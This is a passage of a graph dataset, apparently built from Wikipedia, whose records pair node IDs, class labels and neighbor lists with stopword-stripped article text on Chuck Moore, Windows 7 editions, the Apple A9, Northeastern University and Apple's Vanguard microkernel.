    "text": "Charles_H._Moore:charles h. moore charles havice chuck moore ii born 1938 american computer engineer programmer best known inventor forth programming language 1968 employed united states national radio astronomy observatory nrao moore invented initial version forth language help control radio telescopes 1971 co-founded elizabeth rather forth inc. first still one leading purveyors forth solutions 1970s ported forth dozens computer architectures 1980s moore turned attention forth development techniques cpu design developing several stack machine microprocessors gaining several microprocessor-related patents along way designs emphasized high performance low power usage also explored alternate forth architectures cmforth machine forth closely matched chips machine languages 1983 moore founded novix inc. developed nc4000 processor design licensed harris semiconductor marketed rtx2000 radiation hardened stack processor used numerous nasa missions 1985 consulting firm computer cowboys developed sh-boom processor starting 1990 developed vlsi cad system okad overcome limitations existing cad software used tools develop several multi-core minimal instruction set computer misc chips mup21 1990 f21 1993 moore founder itv corp one first companies work internet appliances 1996 designed another custom chip system i21 moore developed colorforth dialect forth language derived scripting language custom vlsi cad system okad 2001 rewrote okad colorforth designed c18 processor 2005 moore co-founded became chief technology officer intellasys develops markets chip designs seaforth-24 multi-core processor 2009 co-founded became cto greenarrays inc marketing ga4 ga144 multi-computer chips",
    "neighbors": [
      1376,
      3904,
      1702,
      5354,
      10675,
      5655,
      2623
    ],
    "mask": "None"
  },
  {
    "node_id": 9173,
    "label": 2,
    "text": "Windows_7_editions:windows 7 editions windows 7 major release microsoft windows operating system available six different editions starter home basic home premium professional enterprise ultimate home premium professional ultimate widely available retailers editions focus markets software development world enterprise use editions support 32-bit ia-32 cpus editions except starter support 64-bit x64 cpus 64-bit installation media included home-basic edition packages obtained separately microsoft according microsoft features editions windows 7 stored machine regardless edition use users wish upgrade edition windows 7 features could use windows anytime upgrade purchase upgrade unlock features editions microsoft announced windows 7 pricing information editions june 25 2009 windows anytime upgrade family pack pricing july 31 2009 since october 31 2013 windows 7 longer available retail except professional edition preinstalled discontinued october 31 2016 mainstream support editions new features bug fixes ended january 2015 extended support security updates continue january 2020 main editions also take form one following special editions in-place upgrade windows vista service pack 1 windows 7 supported processor architecture language editions match see in-place upgrade supported earlier versions windows moving windows 7 machines requires clean installation i.e removal old operating system installing windows 7 reinstalling previously installed programs windows easy transfer assist process microsoft made upgrade skus windows 7 selected editions windows xp windows vista difference skus full skus windows 7 lower price proof license ownership qualifying previous version windows restrictions in-place upgrading applies skus well addition windows 7 available family pack upgrade edition certain markets upgrade windows 7 home premium gives licenses upgrade three machines vista windows xp windows 7 home premium edition full versions machine upgraded must one qualifying previous versions windows work united states offer expired early december 2009 october 2010 commemorate anniversary windows 7 microsoft made windows 7 home premium family pack available limited time supplies lasted two possible ways upgrade windows 7 earlier version windows table lists upgrade paths allow in-place install note in-place upgrades performed previous version windows architecture upgrading 32-bit installation 64-bit installation downgrading 64-bit installation 32-bit installation clean install mandatory regardless editions used microsoft also supported in-place upgrades lower edition windows 7 higher one using windows anytime upgrade tool currently three retail options available though currently unclear whether used previous installations n versions family pack versions anytime upgrade editions possible use product key standard upgrade edition accomplish in-place upgrade e.g home premium ultimate",
    "neighbors": [
      8576,
      641,
      5380,
      6150,
      3463,
      8841,
      651,
      5004,
      6797,
      8080,
      3857,
      8976,
      10896,
      2196,
      11283,
      4505,
      6686,
      4515,
      11301,
      8103,
      3496,
      6441,
      6697,
      1581,
      10926,
      7983,
      5681,
      3250,
      3890,
      9910,
      10747,
      1978,
      6972,
      10812,
      6462,
      7615,
      321,
      7106,
      582,
      1098,
      10957,
      2383,
      8659,
      11605,
      2391,
      3289,
      4316,
      8798,
      11103,
      5600,
      6114,
      10338,
      2919,
      8296,
      5225,
      4074,
      8299,
      8315,
      9448,
      10989,
      5103,
      1776,
      7796,
      6265,
      7290,
      5243,
      636,
      639
    ],
    "mask": "None"
  },
  {
    "node_id": 9174,
    "label": 3,
    "text": "Apple_A9:apple a9 apple a9 64-bit arm-based system-on-chip soc designed apple inc manufactured apple tsmc samsung first appeared iphone 6s 6s plus introduced september 9 2015 apple stated 70 cpu performance 90 graphics performance compared predecessor apple a8 a9 features apple-designed 64-bit 1.85 ghz armv8-a dual-core cpu called twister a9 iphone 6s 2 gb lpddr4 ram included package a9 per-core l1 cache 64 kb data 64 kb instructions l2 cache 3 mb shared cpu cores 4 mb l3 cache services entire soc acts victim cache a9 includes new image processor feature originally introduced a5 last updated a7 better temporal spatial noise reduction well improved local tone mapping a9 directly integrates embedded m9 motion coprocessor feature originally introduced a7 separate chip addition servicing accelerometer gyroscope compass barometer m9 coprocessor recognize siri voice commands a9 adds hardware decoding heif 8-bit 10-bit hevc a9 features custom storage solution uses apple-designed nvme-based controller communicates pcie connection iphone 6s nand design akin pc-class ssd embedded flash memory common mobile devices gives phone significant storage performance advantage competitors often use emmc ufs connect flash memory a9 microarchitecture similar second generation cyclone used a8 chip microarchitecture microarchitectural features follows half performance boost a8 comes 1.85 ghz frequency quarter comes better memory subsystem 3× bigger caches remaining quarter comes microarchitectural tuning smaller technology node according apple every ios device dedicated aes-256 crypto engine built dma path flash storage main system memory making file encryption highly efficient a9 later a-series processors flash storage subsystem isolated bus granted access memory containing user data via dma crypto engine apple a9 chips fabricated two companies samsung tsmc samsung version called apl0898 manufactured 14 nm finfet process 96 mm large tsmc version called apl1022 manufactured 16 nm finfet process 104.5 mm large intended significant difference performance parts october 2015 alleged iphone 6s models samsung-fabricated a9 chips consistently measured shorter battery life tsmc-fabricated versions cpu heavy usage web browsing graphics different apple responded tests run processors continuous heavy workload battery depletes representative real-world usage said internal testing combined customer data demonstrated variance 2–3 twister cpu core implements armv8-a instruction set architecture licensed arm holdings independent cpu design unrelated much older similarly named cortex-a9 arm9 cpu designed arm implement 32-bit armv7-a armv5e versions architecture processors nearly identical visually packaging dimensions approx 15.0×14.5 mm superficial differences like designation text inside packaging silicon die differs size a9 processor listed minimum requirement arkit",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      9235,
      11282,
      6165,
      11289,
      7706,
      8222,
      1057,
      2551,
      38,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      8237,
      9774,
      2097,
      1074,
      8754,
      9784,
      8250,
      8253,
      576,
      7745,
      1090,
      7747,
      2635,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      99,
      8806,
      3691,
      8812,
      2673,
      6258,
      10357,
      6264,
      10361,
      4220,
      7292,
      2686,
      638,
      6783,
      7806,
      10365,
      10878,
      644,
      4741,
      8842,
      6283,
      7824,
      146,
      147,
      659,
      7830,
      6807,
      5784,
      1177,
      666,
      4251,
      3228,
      5786,
      7833,
      2207,
      4258,
      7842,
      7844,
      4773,
      11430,
      171,
      2735,
      3248,
      9913,
      4283,
      3772,
      7869,
      8893,
      8383,
      8896,
      10945,
      6654,
      4807,
      4810,
      3790,
      1744,
      4821,
      3286,
      9430,
      3293,
      4318,
      9952,
      2788,
      3301,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      9964,
      1776,
      10481,
      6391,
      3835,
      2814,
      1290,
      3338,
      781,
      4879,
      784,
      6415,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      5417,
      2862,
      4399,
      4910,
      7988,
      11062,
      7991,
      11066,
      2363,
      6971,
      2365,
      2366,
      9022,
      11257,
      1346,
      8003,
      10562,
      6981,
      838,
      7496,
      5963,
      8525,
      1871,
      1872,
      9042,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      1377,
      8036,
      9063,
      10602,
      3948,
      11629,
      10608,
      6001,
      373,
      8058,
      9084,
      7549,
      11649,
      2439,
      392,
      3977,
      6023,
      6539,
      7052,
      398,
      1428,
      3483,
      4508,
      2979,
      5028,
      7077,
      9123,
      9638,
      8109,
      3511,
      2492,
      446,
      7614,
      5058,
      9155,
      10691,
      2502,
      456,
      1482,
      9163,
      7118,
      7631,
      464,
      6608,
      980,
      9685,
      8662,
      10199,
      4569,
      8665,
      2524,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      10734,
      5616,
      6130,
      7154,
      1014,
      3575,
      2553,
      10746,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 9175,
    "label": 3,
    "text": "Northeastern_University:northeastern university northeastern university nu neu private research university boston massachusetts established 1898 categorized r1 institution doctoral universities highest research activity carnegie classification institutions higher education university offers undergraduate graduate programs main campus fenway-kenmore roxbury south end back bay neighborhoods boston university satellite campuses charlotte north carolina seattle washington san jose california toronto canada exclusively offer graduate degrees northeastern recently purchased new college humanities london plans open additional campus vancouver canada university enrollment approximately 18,000 undergraduate students 8,000 graduate students northeastern features cooperative education program commonly known co-op integrates classroom study professional experience contains 3,100 partners across seven continents program key part northeastern curriculum experiential learning hundred years one largest co-op/internship programs world required students academic disciplines participate co-op program participation nearly universal among undergraduate students helps distinguish university experience universities northeastern currently ranked 1st best schools internships list princeton review consistently ranked top five decade northeastern also comprehensive study abroad program spans 170 universities colleges northeastern large highly residential university students choose live campus upperclassmen option live campus 75 northeastern students receive form financial aid 2019–20 school year university committed 296.2 million grant scholarship assistance university sports teams northeastern huskies compete ncaa division members colonial athletic association caa 18 varsity sports men women hockey teams compete hockey east men women rowing teams compete eastern association rowing colleges earc eastern association women rowing colleges eawrc respectively men track field caa back back years 2015 2016 2013 men basketball first caa regular season championship men soccer caa title first time women ice hockey record 16th beanpot championship northeastern men hockey team 2018 2019 beanpot beating boston university boston college harvard evening institute younger men located huntington avenue ymca held first class october 3 1898 starting would transform northeastern university course four decades school law formally established year assistance advisory committee consisting dean james barr ames harvard university school law dean samuel bennett boston university school law judge james r. dunbar 1903 first automobile engineering school country established followed school commerce finance 1907 day classes began 1909 1916 bill introduced massachusetts legislature incorporate institute northeastern college considerable debate investigation passed march 1916 march 30 1917 frank palmer speare inaugurated new college first president five years later school changed name northeastern university better reflect increasing depth instruction march 1923 university secured general degree-granting power legislature exception a.b. s.b. medical degrees college liberal arts added 1935 two years later northeastern university corporation established board trustees composed 31 university members 8 ymca 1948 northeastern separated completely ymca following world war ii northeastern began admitting women postwar educational boom university created college education 1953 university college called college professional studies 1960 colleges pharmacy nursing 1964 later combined bouvé college health sciences college criminal justice 1967 followed college computer science 1982 since renamed khoury college computer sciences early 1980s one-time night commuter school grown nearly 50,000 enrollees including full- part-time programs undergraduate graduate level 1989–1990 university enrollment reduced 40,000 full part-time evening students 1990 first class live-on-campus commuter students graduated following retirement president kenneth ryder 1989 university adopted slow thoughtful approach change historically accepting 7,500 10,000 students per year based applications 15,000 20,000 acceptance rates 50 75 depending program attrition rates huge 25 freshmen dropout rate graduation rate 50 40 5,672 undergraduate full-time day students enrolled fall 1984 graduating 1989 president john curry left office 1996 university population systematically reduced 25,000 incoming president richard freeland decided focus recruiting type students already graduating school prime demographic early 1990s university cut freshman class size around 4,500 students 2,800 order become selective began 485 million construction program included residence halls academic research facilities athletic centers 1996 2006 average sat scores increased 200 points retention rates rose dramatically applications doubled university transition students experienced reorganization co-operative education system better integrate classroom learning workplace experience full-time degree programs shifted four-quarter system two traditional semesters two summer minimesters allowing students delve deeply academic courses experience longer substantive co-op placements throughout transformation president freeland oft-repeated goal crack top 100 u.s. news world report rankings accomplished 2005 transformation commuting school national research university complete freeland stepped august 15 2006 replaced dr. joseph aoun former dean university southern california aoun implemented decentralized management model giving university deans control budgets faculty hiring decisions fundraising part five-year 75 million academic investment plan ran 2004 2009 university concentrated undergraduate education core graduate professional programs centers research excellence faculty originally bolstered 100 new tenured tenure-track professors later expanded include 300 additional tenure tenure-track faculty interdisciplinary fields aoun also placed emphasis improving community relations reaching leaders neighborhoods surrounding university addition aoun created academic partnerships institutions boston area including tufts hebrew college school museum fine arts time northeastern advanced national rankings placed 42nd 2014–2015 u.s. news world report best colleges guide 7 position jump 2013–2014 27 place gain since 2010–2011 argued northeastern recent rise rankings shows university cracked code academic rankings others suggested figured game system 2018 edition u.s. news world report ranked northeastern 40th annual ranking national universities whether rise northeastern ranking result effort game system would agree institution continual improvements placement u.s. news world report best colleges guide allowed university improve rapidly via significantly larger endowment competitive student body explains able surpass local universities rankings simmons college wentworth institute technology started around time also said northeastern ranking improvements cyclical effect improved rankings gave university access resources turn allowed improve quality university therefore rankings regardless objectively evident quality university skyrocketed within last twenty years result introduction new academic programs far competitive applicants new buildings larger endowment alumni donations new satellite campuses expansion flagship co-op program early 2019 northeastern university acquired new college humanities 210 student london-based college founded 2012 philosopher a. c. grayling deal pending regulatory approval presidents northeastern tenures office campus buildings named honor addition northeastern main boston campus university operates number satellite locations massachusetts including george j. kostas research institute burlington financial district campus hilton hotel near faneuil hall downtown boston dedham campus dedham marine science center nahant kostas research institute homeland security opened 2011 addition laboratory structural testing resilient sustainable systems stress laboratory laboratory equipped test full-scale large-scale structural systems materials failure explore development new strategies designing simulating sensing structural infrastructure systems university also launched number full-service remote graduate campuses north america including charlotte north carolina october 2011 seattle washington january 2013 san jose california march 2015 toronto ontario 2016 additional satellite campuses austin texas minneapolis minnesota planned northeastern 2019 acceptance rate 18 class 2023 northeastern received 62,000 applications 11,160 students accepted 2018 record number applications 62,272 led drop acceptance rate eight percentage points lower previous year additionally northeastern one top ten applied colleges 2018 class 2021 enrolling fall 2017 northeastern received 54,209 applications also previous year time accepted 14,876 27 enrolled 3,108 applicants northeastern steadily increasing 49,822 2014 54,209 applicants 2017 year applied 2016 9,500 international students 1,128 international applicants 2006 enrolled 20 international students power international education 2017 open doors report northeastern ranked fourth-highest institution united states host international students freshmen enrolled middle 50 range sat scores 660–740 critical reading 710–780 math 690–760 writing act composite range 31–34 class enrolling fall 2013 forbes placed northeastern 35th top 100 colleges ranked sat scores enrolled 76 top tenth high school graduating class 94 top quarter high school graduating class freshman international students 76 state comes undergraduate graduate students number international students totals 13,000 representing 147 different nations half student body due fact vast majority graduate students come abroad number international students northeastern steadily increased 1,000 students every year since 2008 2019 edition u.s. news world report rankings northeastern tied 44th national universities category 2018 northeastern tied 40th national universities category ranked 228th global universities category u.s. news world report 2018 2017 northeastern ranked top 30 colleges highest average sat act scores admitted students 22nd act 27th sat northeastern offers undergraduate majors 65 departments graduate level 125 programs northeastern education interdisciplinary entrepreneurial founded 2009 idea northeastern university student-led venture accelerator provides entrepreneurs including students faculty alumni northeastern community necessary support educational experience towards developing business core concept launch academics northeastern grounded liberal arts education integration classroom studies experiential learning opportunities including cooperative education student research service learning global experience including study abroad international co-op university cooperative education program places 5,000 students annually 3,000 co-op employers boston across united states around globe 2014 college prowler gave northeastern a+ rating quality classes professors overall academic environment colleges listed including schools degrees offered northeastern university offers students opportunity join various ethnic cultural political organizations along numerous honor societies special interest groups fraternities sororities detailed list organizations viewed university honors program offers selected students enhanced curriculum students selected regular applicant pool separate application represent applicants highest gpa sat/act scores year starting first year reading project moving participating wide range courses undergraduate years program gives students variety academic choices culminating experience advanced specialty work major field college-specific choices including specialized advanced honors seminars independent research project addition students honors program exclusively live living-learning community housed west villages c f. fall 2009 university began housing first-year honors students lower nine floors newly constructed international village residence hall starting fall 2017 students housed lower floors even newer 17 story east village residence hall 2017 also marked beginning honors discovery course introduction student assessed integrated learning sail app northeastern one largest co-op/internship programs world started 1909 nu co-op program one oldest nation co-op program students alternate periods academic study periods professional employment usually paid related major majors offer four-year graduation option fewer co-op placements five-year program slightly popular students students co-op pay tuition students living campus pay room board co-op program typically begins spring second year fall third year traditional program first semesters campus students usually take anywhere one three 96 participating one 78 participating two co-op placements range small start-up companies large multinational companies including many fortune 500 corporations program also places students government agencies branches government nonprofits non-governmental organizations northeastern students found interning united states congress white house united nations nasa student placements usually last six months time students paid students may live university residence halls campus co-op employment university currently leases housing students co-oping new york city san francisco seattle washington d.c. assists elsewhere northeastern co-op students staying boston usually benefit fact city prominent industries numerous offices/headquarters boston consequential industries financial sector technology sector medicine/life sciences sector tend hire many co-ops fields especially big-name companies comes d'amore-mckim business students many co-ops end working large financial firms state street john hancock financial accounting firms pricewaterhousecoopers pwc deloitte touche well consulting firms boston consulting group tend hire many co-ops every cycle well retail companies like tjx companies staples tend hire several marketing students every cycle students also decide develop co-ops wish something offered usually involves starting new company reaching company northeastern partnership facilitating creation co-op partnership many companies continually pass co-op opportunities northeastern students new partnerships documented northeastern co-op database known nucareers given future northeastern students students decide start companies usually involved idea northeastern venture accelerator sometimes spend entire two three co-ops solely developing companies might also join husky startup challenge also helps develop student-run companies company successful either idea husky startup challenge often move onto masschallenge boston huge global non-profit startup accelerator competition northeastern students take least one class prepares co-op expectations given industry schools like d'amore-mckim students take three different one-credit classes prepare co-op classes students work advisers inside outside class pursue potential co-ops well work strategies make competitive candidates co-op program led university high reputation comes job placement 50 northeastern students receive job offer previous co-op employer 92 either employed enrolled graduate school 9 months graduation also led northeastern consistently rank within top 5 princeton review list best career services/internships within last decade mainly taking top spot list split best career services best internships 2016 northeastern currently ranks 3rd career services 5th internships united states senior capstone advanced-level course related student major course requires student integrate learned academic coursework experiential learning experience co-op research study abroad service university partnered tufts university school medicine create early-acceptance ba/md program program since discontinued northeastern campus blocks longwood medical academic area harvard medical school harvard school dental medicine located along associated teaching hospitals northeastern semester-long study abroad programs placements africa asia australia europe south america participating schools include university cambridge london school economics england university edinburgh scotland reims management school france european school business germany university cape town south africa university auckland new zealand swinburne university technology australia obirin university japan american college thessaloniki greece pontificia universidad católica de chile chile also antarctica northeastern international business program member international partnership business schools program international business students opportunity awarded dual-degree northeastern well sister school abroad since arrival president aoun 2006 school also emphasizing co-op abroad effort make school global internationally engaged many programs offered including social entrepreneurship peru kenya south africa northeastern also notable dialogues civilizations program features dozens one-month-long programs usually taking place summer faculty member teach group students foreign country related curriculum specific class sort mini study abroad program area focus – example geneva program focuses small arms multilateral negotiations south africa program based non-governmental organizations program meant communicative experience exchange ideas cultures open majors years popular study abroad option northeastern program used northeastern students gain extra credits minor concentration also used students trying graduate 4 years also participating one co-ops program sometimes take place multiple locations entrepreneurship global consulting israel dialogue starts boston eventually students go tel-aviv beer sheva israel dialogues span multiple countries one taught marrakesh morocco amsterdam concluding paris addition dialogues civilizations program northeastern also offers program called n.u.in primarily first-year students choose start first semester studying abroad program accepts students university spend first semester studying foreign university partnered northeastern students take classes english credits transfer northeastern arrive campus spring program began 2007 creation n.u.in australia option students go abroad fall semester coming home campus boston students year go n.u.in fall spring semester however majority complete program complete fall freshman year 2008 greece england added options n.u.in since early 2010s program started accepting students university selecting students admit n.u.in program idea behind bring students diverse experiences back boston campus presenting students motivated travel opportunity immediately study abroad also used introduce students professors communities across globe northeastern students could help university global presence northeastern goals global expansion outlined northeastern 2025 campaign stating northeastern 2025 build university network campuses around world create intercultural hubs lifelong experiential learning expanded study-abroad programs international co-op opportunities international dialogues coursework embedded employer partners 2012 500 students enrolled n.u.in program time offered destinations london dublin thessaloniki greece sydney san josé costa rica 2017 number grew 1,100 students program expanded shanghai rome berlin montreal melbourne removed san josé n.u.in destination students n.u.in program study top college campuses around world like mcgill university n.u.in canada students university sydney n.u.in australia students locations including n.u.in australia n.u.in england n.u.in ireland northeastern partnered two universities give students options would like study 2019 n.u.in locations include australia canada england greece ireland italy research centers institutes northeastern include university provides undergraduate students opportunity engage research center experiential education censsis research experience undergraduates honors research louis stokes alliance minority participation program provost office research grants fy 2007 annual external research funding exceeded 78 million fy 2009–2010 research funding close 82 million 2002 northeastern center subsurface sensing imaging systems designated nsf engineering research center 2004 northeastern one six institutions selected national science foundation center research nanotechnology 2010 northeastern granted 12 million alum homeland security research facility named george j. kostas research institute homeland security chief benefactor northeastern 1,257 full-time faculty 94.4 possess doctorate terminal degree field 403 part-time faculty fall 2015 northeastern faculty members direct 35 research education centers including national science foundation nsf engineering research center nsf nanomanufacturing center two nsf integrated graduate education research traineeship programs northeastern university accredited new england association schools colleges neasc empower campaign launched may 2013 goal raise 1 billion 2017 500 million philanthropic support 500 million industry government partnerships goal raised 1.25 billion 2015 campaign inspired richard d'amore alan mckim 60 million donation university business school 2012 money raised student support co-ops study abroad student research student ventures financial aid faculty advancement/expansion innovation education development co-op program research october 2017 northeastern revealed final total empower campaign 1.4 billion 100,000 individuals 3,800 organizations donated empower donors came 110 different nations across globe university able surpass goal twice surpassed goal set 2015 150 million northeastern 19 varsity teams ncaa 30 club sports teams 200 student organizations several prominent student-run organizations including resident student association rsa student government association sga northeastern university television nutv fraternity sorority life fsl council university programs cup organize activities northeastern students well surrounding community fourteen eighteen northeastern varsity sports teams competing ncaa division colonial athletic association since 2005 school sponsors following sports teams nu mascot paws school colors red black white trim fight song hail northeastern composed charles a. pethybridge class 1932 notable athletes played northeastern sports teams dan ross played football northeastern long setting super bowl record receptions game reggie lewis still holds men basketball career scoring record jose barea played point guard huskies averaged 21 points 4.4 rebounds 8.4 assists per game senior barea drafted dallas mavericks 2006 carlos peña named major league baseball american league comeback player year 2007 al gold glove winner 2008 u.s. olympic women ice hockey teams included northeastern alumni shelley looney chanda gunn baseball team competed one college world series played ncaa regionals seven times first year caa men basketball team finished 6th place 12 teams advanced semifinals conference tournament caa proved competitive conference 2006 ncaa basketball tournament george mason university advanced way final four 2007 second year caa women track team captured conference championship volleyball team finished second women basketball team 10 games 2008 previous year biggest one-year turnaround caa advanced tournament quarterfinals northeastern men women hockey teams compete hockey east conference 2007–2008 season men team ranked high 7 country held top spot conference finishing season sixth place hockey east teams also participate annual beanpot tournament four major boston-area colleges northeastern men team annual event 4 times 54-year history women team captured beanpot 14 times 2008–2009 season men team ranked high 3rd nation held top spot hockey east last weekend season team made ncaa tournament first time since 1994 beanpot championship game first time since 2004 goalie brad thiessen made hobey hat trick second northeastern player northeastern 2018 beanpot championship defeating boston college 3-0 first match defeating boston university 5-2 final match victory came northeastern attained highest placement 2017-2018 standings beanpot competitors beanpot also presents two awards individual players one valuable player one best goalie determined best save percentage second award named eberly award glen dan eberly goalies northeastern boston university addition winning beanpot title northeastern took home awards award valuable player presented adam gaudette eberly award presented cayden primeau save percentage .974 making goalie second highest save percentage win award 44 years award given northeastern crew team consistently ranks one top 10 teams nation 2008 national championship team made grand finals placed fourth behind university wisconsin–madison university washington university california berkeley beating brown university princeton university university pennsylvania harvard university northeastern offers 40 club sports including sailing judo rugby lacrosse alpine skiing squash cycling ultimate frisbee 2005 women rugby team finished third nation division ii year men rugby team largest annual tournament united states recently women rugby team competed placed 11th collegiate rugby championship men lacrosse team began 2008 season ranked top 10 nationally men women squash team finished 2008 season ranked top 20 nationally 2008–2009 academic year northeastern club field hockey women basketball teams respective national championships 2007 2009 northeastern club baseball team three straight new england club baseball association championships may 25 2010 club baseball team defeated penn state win national club baseball association division ii world series national championship citing sparse attendance numerous losing seasons expense renovate parsons field acceptable standard university board trustees voted november 20 2009 end football program according president joseph aoun leadership requires make choices decision allows us focus existing athletic programs northeastern located boston fenway roxbury back bay neighborhoods adjacent huntington avenue near museum fine arts symphony hall area also known fenway cultural district although located heart boston nu campus still filled trees flowers grassy quads since late 1990s northeastern considered model design urban universities twice beautiful new renovated exterior space award presented american institute architects 2001 2004 site first baseball world series commemorated front university churchill hall statue cy young recent sustainable endowments institute college sustainability report card issued northeastern grade a- environmental sustainability efforts programs additionally princeton review rated northeastern one top 15 green colleges nation 2010 2011 greenmetric world university ranking evaluated northeastern second greenest university world first us accordance boston zoning code amendment 2007 international village residence hall certified leed gold building 2010 dockser hall first building campus achieve leed certification also gold completion renovation 2010 northeastern university police department nupd full-service law enforcement agency full powers arrest university property property used northeastern students faculty campus adjacent boston police department headquarters 2008 reader digest survey ranked nu second safest school united states johns hopkins university maryland northeastern bracketed mbta orange line green line e branch six stations serve campus massachusetts avenue ruggles orange line symphony northeastern museum fine arts longwood medical area green line green line paralleled 39 bus ruggles also serves needham providence/stoughton franklin lines mbta commuter rail system northeastern campus mostly located along huntington avenue area known fenway cultural district part boston fenway back bay neighborhoods notable institutions district include museum fine arts isabella stewart gardner museum symphony hall huntington theatre company new england conservatory boston conservatory berklee college music christian science center mary baker eddy library harvard school public health northeastern campus something urban oddity despite location central boston northeastern home significant amount green open space quads site master planning competition awarded contract revive rejuvenate campus process started 1988 creation new northeastern quad mt ryder small oval land centrally located campus main entrance refurbished donations graduating class 1989 concrete square outside library student center transformed brick pavers granite curbstones scalloped design would eliminate square corners concept developed outgoing class 1989 northeastern news poll suggestion president ryder assoc dean students harvey vetstein presented board trustees march 1988 corners campaign kicked fundraiser ell student center parents weekend october 1988 later selection nationally recognized green space landscape architect 1990 started renewal plan continues today since late 1990s northeastern twice beautiful new renovated exterior space award presented american institute architects 2001 2004 2008 west village building f recognized american institute architects new england 2008 merit awards design excellence 2004 northeastern awarded prestigious gold medal massachusetts horticultural society dedham campus residential halls northeastern vary quite significantly buildings like kennedy hall 153 hemenway street former boston apartment buildings bought northeastern turned residential halls international village east village tall high-rise buildings built specifically purpose housing northeastern students residential halls host little 50 students many 1,000 traditional dorms include one room single double triple quad depending many students reside suites usually contain bathroom shared common area multiple rooms residential buildings traditional housing following list divides ones contain traditional ones suite-style housing traditional accommodations suite-style accommodations students usually divided groups called living learning communities llcs place student certain majors interests hobbies together llcs host events related specific area interest members llc participate llcs span sections floors residential hall entire floors multiple floors entire buildings found present multiple buildings list llcs offered freshman first year college affiliated llc options first year interdisciplinary llc options first year thematic based llc options east village northeastern newest dorm building honors freshmen upperclassmen building located 291 st. botolph street opened january 2015 honors freshman live suite-style rooms whereas upperclassmen choose full apartments kitchen facilities total five classrooms found building four basement one first floor event space provided 17th floor west village complex includes eight buildings serving mainly residence halls classrooms plans building k 22-story high rise housing 600 beds completed rented university able buy opened 1910 widely known boston arena matthews arena world oldest surviving indoor ice hockey arena located east edge northeastern university campus home northeastern huskies men women hockey teams men basketball team well wentworth institute technology men hockey team arena named former chair board trustees george j. matthews wife late hope m. matthews arena original home nhl boston bruins wha new england whalers nhl carolina hurricanes also secondary home nba boston celtics 1940s hosted part america east conference men basketball tournament total seven times hosted 1960 frozen four arena also served original home annual beanpot tournament boston four major college hockey programs named roger marino co-founder emc corporation marino center features first floor atrium two cafés tatte b.good food market wollaston second floor includes student exercise area multipurpose room used aerobics classes martial arts clubs gymnasium consists three basketball courts third floor state-of-the-art resistance training area fully equipped free weight room three-lane suspended track available either walking jogging rowing ergometers available centennial common created mark 100th anniversary university 1998 also serves gateway west campus area large grass oval spans hundred feet contains lawnchairs students relax well flagpole displays u.s. flag area frequently used students recreational purposes organizations/clubs booths nu libraries include snell library john d. o'bryant african-american institute library nu school law library separately administered nu school law snell library opened 1990 cost 35 million contains 1.3 million volumes digital media design studio within library collaborative interdisciplinary learning environment creating course-related multimedia presentations projects portfolios library home favat collection current collection children literature k-12 curriculum resources instructional materials related information support courses offered school education contains three computer labs operated nu information services two available nu students faculty staff teaching lab june 2016 library staff adopted open-access policy make members professional research publicly accessible online nu libraries received federal depository designation 1962 selective depository libraries receive forty-five percent federal publication series available depository libraries snell library also home northeastern university archives special collections department includes benjamin laguer papers collection special collections focus records boston-area community-based organizations concerned social justice issues snell library also open 24 hours day allowing students study given time within urban environment characterizes campus whole nu carved quiet peaceful space centrally located ell building spiritual life center sacred space nondenominational sacred space center main assembly hall configured carpets mats chairs distinctive ceiling consisting 3 hanging domes made overlapping aluminum tiles origami-like effect warm wood floors accents glass-paneled walls lean outward slightly shape material giving sense openness volume space faucets ablution available flanking antechamber center also contains smaller meeting space library sacred space opened 1998 architects office da nader tehrani monica ponce de leon received 2002 harleston parker medal boston society architects design northeastern university southernmost section campus located along columbus avenue roxbury parallel orange line university expanded south roxbury time building west village 2001 davenport commons opened providing 585 students housing two residence halls 75 families representing range incomes able purchase condo townhouse boston market value davenport commons also created commercial space tremont street summer 2006 northeastern university proposed new residence hall away main campus corner tremont street ruggles street construction began late february 2007 spring 2009 complex named international village opened later summer nicknames include iv inv consists three interconnected residence halls office complex administration building gym 400-seat dining hall available members northeastern community well public following buildings make south campus residential buildings administrative buildings athletic buildings february 21 2014 northeastern university groundbreaking ceremony new interdisciplinary science engineering complex isec columbus avenue completed 2017 building provides research educational space students faculty college science bouvé college health sciences college engineering khoury college computer sciences centerpiece complex includes large atrium spiral staircase 280-seat auditorium dodge hall mainly used northeastern business programs snell library opened 1990 served university main library dodge hall five floors basement houses computer lab connected university large network underground tunnels connects many buildings classrooms lounge area occupy first floor d'amore-mckim school business undergraduate office second floor graduate office third floor school professional accounting office fourth floor directly behind dodge hall ymca northeastern founded ell hall one oldest buildings campus hosts northeastern largest auditorium blackman auditorium blackman hosts many different types events classes theatre groups dance teams musical groups choral groups fraternities sororities orchestral ensembles blackman hosted many talented individuals dr. maya angelou seth meyers like dodge hall ell hall five floors also connects underground tunnel network building also contains classrooms art gallery",
    "neighbors": [
      10083,
      132,
      4839,
      2666,
      5837,
      11255,
      4828
    ],
    "mask": "None"
  },
  {
    "node_id": 9176,
    "label": 3,
    "text": "Vanguard_(microkernel):vanguard microkernel vanguard discontinued experimental microkernel developed apple computer research group atg early 1990s based v-system vanguard introduced standardized object identifiers unique message chaining system improved performance vanguard used apple commercial products development ended 1993 ross finlayson project principal investigator left apple vanguard generally similar v-system added support true object oriented programming operating system meant kernel server interfaces exported objects could inherited extended new code change real effect system primarily change source code makes programming easier instance vanguard i/o class supported number different servers networking file servers instance new applications could interact importing i/o interface calling methods also made writing new servers much easier standard program well able share code easily key concept almost microkernels breaking single large kernel set communicating servers instead single large program control entire hardware side computer system sorts duties handed smaller programs given rights control different parts machine instance particular server might given control networking hardware another task managing hard drives another server would handle file system calling lower-level servers user applications ask services sending messages servers using form inter-process communications ipc opposed asking kernel work via syscall trap v ipc system appears conceptually modeled remote procedure calls rpc client application perspective client application imported interface definition file containing information calls supported kernel applications used definition package requests called kernel would immediately take examine results pass information right handler potentially within kernel results handed back kernel client general terms operation system appears client application similar working normal monolithic kernel although results passed back might come third party handler essentially invisible client servers handling requests operated similar fashion clients opening connections kernel pass data however servers generally spawned new threads required handle longer-lasting requests handled responses posted 